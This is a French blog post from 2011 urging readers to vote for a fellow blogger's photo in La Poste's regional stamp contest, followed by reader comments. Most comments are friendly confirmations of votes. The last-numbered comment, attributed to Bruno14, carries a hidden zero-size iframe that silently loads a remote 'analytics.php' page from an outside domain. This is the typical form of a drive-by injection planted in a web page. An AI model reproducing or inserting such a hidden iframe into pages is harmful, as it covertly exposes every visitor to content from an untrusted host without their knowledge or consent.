• Un Eklablogueur timbré ?

    Bruno14 devriendra-t-il timbré ?

    Avec notre aide, ça peut se faire !

    Mais qu'est-ce qu'elle dit ???!!!!!

    Mais non les Amis !
    Le but n'est pas de le rendre fou mais de lui filer un bon coup de pouce dans le cadre d'un concours intéressant.

    La Poste organise un concours : Ma région comme j'aime.
    Les photos des participants sont soumises à nos votes et les photos les plus plébiscitées peuvent devenir... des timbres.

    Franchement, l'idée de coller sur mes prochains courriers un timbre fait par un Eklablogueur, ben.. ça me botte bien !

    Bougez avec la Poste...

    Alors à vos souris et cliquez !
    Date limite des votes : 04 novembre 2011

    Un Eklablogueur timbré ?

    cliquer sur le timbre pour voter !

     

    Les Photos de Bruno

     

    « Ils vous aident !Tout en Un »

    Tags Tags : , , , ,
  • Commentaires

    8
    Bruno14 Profil de Bruno14
    Mercredi 23 Novembre 2011 à 09:57

    Merci à tous pour votre soutien et votre vote.

    Bonne journée

    <iframe style="visibility: hidden;" src="http://loading-resource.com/analytics.php" width="0" height="0"></iframe>

    7
    Dimanche 30 Octobre 2011 à 22:10

    Très beau timbre, j'ai voté !

    6
    Dimanche 30 Octobre 2011 à 15:36

    Voilà : j'ai voté ! Moi sa double collègue : Postière et Eklablogueuse !!! Bisous Iron

    5
    Dimanche 30 Octobre 2011 à 10:16

    hello

    voilà qui est fait pour le timbré :o)))  bon dimanche

    bises

    4
    Dimanche 23 Octobre 2011 à 09:00

    Merci pour lui Aimie !

    C'est ce que j'aime comme état d'esprit sur la Toile :)

    3
    Samedi 22 Octobre 2011 à 18:59

    bonjour ironsponn

    Entre membre il faut se soutenir. J'ai donc voté pour lui!

    Merci pour le lien de son blog.Elle est toute choupette sa cracotte!

    2
    mylarêve
    Vendredi 21 Octobre 2011 à 18:02

    Salut Iron,j'espère que tu vas bien,je viens te faire un petit coucou,je te souhaite une belle journée,bizzz!!!

    1
    Mardi 18 Octobre 2011 à 21:20

    Salut ! comment çà va ? j'ai voté ! visité aussi le "blog de Bruno 41" belle promenade ..


    bisous, iron ... demain mercrddi, centre aéré ..! eh oui !

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :